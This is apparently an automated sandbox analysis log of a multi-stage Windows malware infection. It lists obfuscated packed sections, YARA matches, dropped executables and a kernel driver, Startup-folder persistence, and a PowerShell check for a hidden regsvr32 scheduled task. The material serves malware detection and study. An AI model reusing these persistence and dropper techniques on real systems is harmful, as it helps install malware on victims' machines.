                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: avicap32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Section loaded: msvfw32.dll
                          Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Window found: window name: TMainForm
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Livid Pocket_is1
                          Source: file.exe Static file information: File size 3198976 > 1048576
                          Source: file.exe Static PE information: Raw size of mrenudwa is bigger than: 0x100000 < 0x2a1200
                          Source: Binary string: Qzqfjz.pdb source: Ele.exe, 00000015.00000002.3080168462.000000001BF00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Calculadora\Calculadora\obj\Debug\Calculadora.pdbMhgh Yh_CorExeMainmscoree.dll source: 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: pyexpat.pyd.55.dr
                          Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: yklcfqtilcgt.exe, 0000002B.00000003.2499734938.000001ADB9DA0000.00000004.00000001.00020000.00000000.sdmp
                          Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e44fda3216.exe, 0000000B.00000003.2733601051.0000000007CD0000.00000004.00001000.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3327334251.0000000005BA2000.00000040.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Administrator\Desktop\Calculadora\Calculadora\obj\Debug\Calculadora.pdb source: 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmp
                          Source: Binary string: protobuf-net.pdb source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: db3cab6cee.exe, 00000037.00000003.2710982962.000001E194DF4000.00000004.00000020.00020000.00000000.sdmp, db3cab6cee.exe, 00000037.00000002.3303641960.00007FF6F0648000.00000002.00000001.01000000.0000001E.sdmp, db3cab6cee.exe, 00000037.00000000.2700074672.00007FF6F0648000.00000002.00000001.01000000.0000001E.sdmp, db3cab6cee.exe, 00000037.00000003.2707112122.000001E1964A4000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: zjFtdxQ.tmp, 0000000D.00000003.2408195203.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, zjFtdxQ.tmp, 0000000D.00000003.2412265695.0000000003508000.00000004.00001000.00020000.00000000.sdmp

                          Data Obfuscation

                          Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.e50000.0.unpack :EW;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mrenudwa:EW;qxwztaye:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Unpacked PE file: 11.2.e44fda3216.exe.c70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ulxuyjiv:EW;scqvijkn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ulxuyjiv:EW;scqvijkn:EW;.taggant:EW;
                          Source: NzL6O1Q[1].exe.5.dr, Helper.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: NzL6O1Q.exe.5.dr, Helper.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: NzL6O1Q.exe.20.dr, Helper.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: NzL6O1Q.exe0.20.dr, Helper.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, ListDecorator.cs .Net Code: Read
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                          Source: 21.2.Ele.exe.2a70000.1.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                          Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                          Source: Yara match File source: 21.2.Ele.exe.1315ae50.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 21.2.Ele.exe.de0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000015.00000002.2849008746.0000000000DE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000015.00000002.2971352807.00000000130D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: Ele.exe PID: 8032, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: Ele.exe PID: 3408, type: MEMORYSTR
                          Source: 9LbUK15[1].exe.5.dr Static PE information: 0xFFABC69F [Sat Dec 5 09:13:03 2105 UTC]
                          Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4046953
                          Source: random[1].exe1.5.dr Static PE information: real checksum: 0x1c80b5 should be: 0x1d5655
                          Source: 9LbUK15[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9919
                          Source: NzL6O1Q[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x769ab
                          Source: NzL6O1Q.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x769ab
                          Source: NzL6O1Q.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x769ab
                          Source: pcqxl.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x287d50
                          Source: zjFtdxQ.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x1a5444
                          Source: Ele.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x94c7d
                          Source: _setup64.tmp.13.dr Static PE information: real checksum: 0x0 should be: 0x8546
                          Source: zjFtdxQ.tmp.14.dr Static PE information: real checksum: 0x0 should be: 0x122532
                          Source: is-4SN19.tmp.15.dr Static PE information: real checksum: 0x0 should be: 0x12afba
                          Source: zjFtdxQ.tmp.12.dr Static PE information: real checksum: 0x0 should be: 0x122532
                          Source: skotes.exe.0.dr Static PE information: real checksum: 0x311dd2 should be: 0x31967b
                          Source: random[2].exe.5.dr Static PE information: real checksum: 0x445f84 should be: 0x441356
                          Source: _isdecmp.dll.15.dr Static PE information: real checksum: 0x0 should be: 0x5528
                          Source: 9LbUK15.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9919
                          Source: e44fda3216.exe.5.dr Static PE information: real checksum: 0x1c80b5 should be: 0x1d5655
                          Source: 718e743381.exe.5.dr Static PE information: real checksum: 0x1ec5d8 should be: 0x1f0384
                          Source: zjFtdxQ[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x1a5444
                          Source: random[1].exe.5.dr Static PE information: real checksum: 0x1ec5d8 should be: 0x1f0384
                          Source: _isdecmp.dll.13.dr Static PE information: real checksum: 0x0 should be: 0x5528
                          Source: bed2608720.exe.5.dr Static PE information: real checksum: 0xb4cee should be: 0x1bb421
                          Source: _setup64.tmp.15.dr Static PE information: real checksum: 0x0 should be: 0x8546
                          Source: NzL6O1Q.exe0.20.dr Static PE information: real checksum: 0x0 should be: 0x769ab
                          Source: file.exe Static PE information: real checksum: 0x311dd2 should be: 0x31967b
                          Source: is-VSE52.tmp.15.dr Static PE information: real checksum: 0x1f4ede should be: 0x1f2d68
                          Source: random[1].exe0.5.dr Static PE information: real checksum: 0xb4cee should be: 0x1bb421
                          Source: 739ad26354.exe.5.dr Static PE information: real checksum: 0x445f84 should be: 0x441356
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name: mrenudwa
                          Source: file.exeStatic PE information: section name: qxwztaye
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name: mrenudwa
                          Source: skotes.exe.0.drStatic PE information: section name: qxwztaye
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe.5.drStatic PE information: section name:
                          Source: random[1].exe.5.drStatic PE information: section name: .idata
                          Source: random[1].exe.5.drStatic PE information: section name:
                          Source: random[1].exe.5.drStatic PE information: section name: irrkukjx
                          Source: random[1].exe.5.drStatic PE information: section name: tvxezsde
                          Source: random[1].exe.5.drStatic PE information: section name: .taggant
                          Source: 718e743381.exe.5.drStatic PE information: section name:
                          Source: 718e743381.exe.5.drStatic PE information: section name: .idata
                          Source: 718e743381.exe.5.drStatic PE information: section name:
                          Source: 718e743381.exe.5.drStatic PE information: section name: irrkukjx
                          Source: 718e743381.exe.5.drStatic PE information: section name: tvxezsde
                          Source: 718e743381.exe.5.drStatic PE information: section name: .taggant
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: .idata
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: hasiulpx
                          Source: random[2].exe.5.drStatic PE information: section name: eqgokjfj
                          Source: random[2].exe.5.drStatic PE information: section name: .taggant
                          Source: 739ad26354.exe.5.drStatic PE information: section name:
                          Source: 739ad26354.exe.5.drStatic PE information: section name: .idata
                          Source: 739ad26354.exe.5.drStatic PE information: section name:
                          Source: 739ad26354.exe.5.drStatic PE information: section name: hasiulpx
                          Source: 739ad26354.exe.5.drStatic PE information: section name: eqgokjfj
                          Source: 739ad26354.exe.5.drStatic PE information: section name: .taggant
                          Source: random[1].exe1.5.drStatic PE information: section name:
                          Source: random[1].exe1.5.drStatic PE information: section name: .idata
                          Source: random[1].exe1.5.drStatic PE information: section name:
                          Source: random[1].exe1.5.drStatic PE information: section name: ulxuyjiv
                          Source: random[1].exe1.5.drStatic PE information: section name: scqvijkn
                          Source: random[1].exe1.5.drStatic PE information: section name: .taggant
                          Source: e44fda3216.exe.5.drStatic PE information: section name:
                          Source: e44fda3216.exe.5.drStatic PE information: section name: .idata
                          Source: e44fda3216.exe.5.drStatic PE information: section name:
                          Source: e44fda3216.exe.5.drStatic PE information: section name: ulxuyjiv
                          Source: e44fda3216.exe.5.drStatic PE information: section name: scqvijkn
                          Source: e44fda3216.exe.5.drStatic PE information: section name: .taggant
                          Source: random[1].exe2.5.drStatic PE information: section name: .didat
                          Source: random[1].exe2.5.drStatic PE information: section name: _RDATA
                          Source: db3cab6cee.exe.5.drStatic PE information: section name: .didat
                          Source: db3cab6cee.exe.5.drStatic PE information: section name: _RDATA
                          Source: pcqxl.exe.9.drStatic PE information: section name: .00cfg
                          Source: is-VSE52.tmp.15.drStatic PE information: section name: .xdata
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6D91C push ecx; ret 0_2_00E6D92F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E61359 push es; ret 0_2_00E6135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0041D91C push ecx; ret 1_2_0041D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_00450193 push cs; retn 0004h5_2_00450196
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0041D91C push ecx; ret 5_2_0041D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0043DEDB push ss; iretd 5_2_0043DEDC
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0041DFC6 push ecx; ret 5_2_0041DFD9
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534A88F pushad ; iretd 11_3_0534AA31
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB66 push 680534CBh; retf 11_3_0534CB6D
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB62 pushad ; retf 11_3_0534CB65
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB52 push eax; retf 11_3_0534CB55
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB5E pushad ; retf 11_3_0534CB61
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534CB4E push eax; retf 11_3_0534CB51
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_0534FC2D push 0000005Ah; retf 11_3_0534FC34
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_05350115 push ecx; ret 11_3_05350151
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_05350158 push eax; ret 11_3_05350159
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeCode function: 11_3_00619378 push ecx; retf 0064h11_3_0061939A
                          Source: file.exeStatic PE information: section name: entropy: 7.060098617572218
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.060098617572218
                          Source: random[1].exe.5.drStatic PE information: section name: irrkukjx entropy: 7.947685674530026
                          Source: 718e743381.exe.5.drStatic PE information: section name: irrkukjx entropy: 7.947685674530026
                          Source: random[2].exe.5.drStatic PE information: section name: hasiulpx entropy: 7.957119984224612
                          Source: 739ad26354.exe.5.drStatic PE information: section name: hasiulpx entropy: 7.957119984224612
                          Source: random[1].exe1.5.drStatic PE information: section name: entropy: 7.979144122611361
                          Source: random[1].exe1.5.drStatic PE information: section name: ulxuyjiv entropy: 7.954361069139487
                          Source: e44fda3216.exe.5.drStatic PE information: section name: entropy: 7.979144122611361
                          Source: e44fda3216.exe.5.drStatic PE information: section name: ulxuyjiv entropy: 7.954361069139487
                          Source: Ele.exe.6.drStatic PE information: section name: .text entropy: 7.993828569787845

                          Persistence and Installation Behavior

                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeProcess created: "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe"
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeFile created: C:\Windows\TEMP\aodefromlpug.sys
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingft.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pyexpat.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_keccak.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-32.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_ghash_clmul.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\python311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD2.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_chacha20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA224.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QEKST.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-32.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\pywintypes311.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\_ed25519.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_MD4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Util\_strxor.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\libssl-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA224.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\9LbUK15[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\cli-arm64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_SHA512.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\select.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_ARC4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui-arm64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_poly1305.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Local\is-4SN19.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_ARC4.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_SHA512.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_portable.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\PublicKey\_ed448.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmpFile created: C:\Users\user\AppData\Roaming\9rpcss_1.drv (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exeFile created: C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmpJump to dropped file
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeFile created: C:\Windows\Temp\aodefromlpug.sysJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeFile created: C:\Users\user\AppData\Roaming\NzL6O1Q.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_chacha20.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeFile created: C:\Users\user\AppData\Local\Temp\pcqxl.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_keccak.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\gui.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\_scrypt.pydJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
